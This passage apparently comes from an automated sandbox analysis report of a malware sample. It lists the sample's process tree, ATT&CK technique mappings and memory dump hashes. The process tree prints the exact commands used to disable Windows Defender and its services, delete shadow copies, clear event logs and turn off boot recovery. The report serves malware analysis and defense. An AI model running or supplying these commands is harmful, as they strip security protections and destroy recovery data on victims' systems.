  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1740
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2⤵
  PID:940
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2⤵
  PID:808
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2⤵
  PID:1276
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  2⤵
  PID:380
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:1580
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:512
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2⤵
  PID:1376
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2⤵
  PID:680
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2⤵
  PID:1412
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2⤵
  PID:1208
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2⤵
  PID:1980
- C:\Windows\system32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  2⤵
  PID:684
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  2⤵
  PID:2032
- C:\Windows\system32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  2⤵
  PID:276
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:1116
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:1428
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:1728
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:728
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1708
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:336
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1948
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies security service
  PID:916
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1408
- C:\Windows\system32\vssadmin.exe
  vssadmin.exe delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:756
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl system
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:1648
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl security
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:1652
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl application
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:1480
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:944
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe shadowcopy delete
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1968
- C:\Windows\system32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1792
- C:\Windows\system32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled no
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1604
- C:\Windows\system32\cmd.exe
  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
  2⤵
  PID:1300
- - C:\Program Files\Windows Defender\MpCmdRun.exe
    "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    3⤵
    - Deletes Windows Defender Definitions
    PID:1160
- C:\Windows\system32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:988
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIOAVProtection $true
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1812
- C:\Windows\system32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  PID:1712
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableRealtimeMonitoring $true
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1768

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Impair Defenses

T1562

Indicator Removal on Host

T1070

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
518486dffec7d61e97730f9dc6c24aaa

SHA1
6198cb33b781deec8a1e9b538a57b04704057343

SHA256
f109291c5abe9f0acd84f50f989803423c862aca638978f6b111b65d486abfba

SHA512
c5cb08510662c00356f75b396e186ed5da16e08c4ed34226531401fa22eff925ba2f92a559a73299df68b6631812a92c0a944bb958c3563db44e8e43d90462da

Download Submit
memory/1648-113-0x000007FEFB531000-0x000007FEFB533000-memory.dmp

Filesize
8KB

Download
memory/1768-131-0x00000000023D4000-0x00000000023D7000-memory.dmp

Filesize
12KB

Download
memory/1768-133-0x00000000023DB000-0x00000000023FA000-memory.dmp

Filesize
124KB

Download
memory/1768-132-0x00000000023D4000-0x00000000023D7000-memory.dmp

Filesize
12KB

Download
memory/1768-130-0x000007FEF2F80000-0x000007FEF3ADD000-memory.dmp

Filesize
11.4MB

Download
memory/1768-129-0x000007FEF3AE0000-0x000007FEF4503000-memory.dmp

Filesize
10.1MB

Download
memory/1812-125-0x000000000279B000-0x00000000027BA000-memory.dmp

Filesize
124KB

Download
memory/1812-126-0x000000000279B000-0x00000000027BA000-memory.dmp

Filesize
124KB

Download
memory/1812-124-0x0000000002794000-0x0000000002797000-memory.dmp

Filesize
12KB

Download
memory/1812-122-0x000007FEF3140000-0x000007FEF3B63000-memory.dmp

Filesize
10.1MB

Download
memory/1812-123-0x000007FEF25E0000-0x000007FEF313D000-memory.dmp

Filesize
11.4MB

Download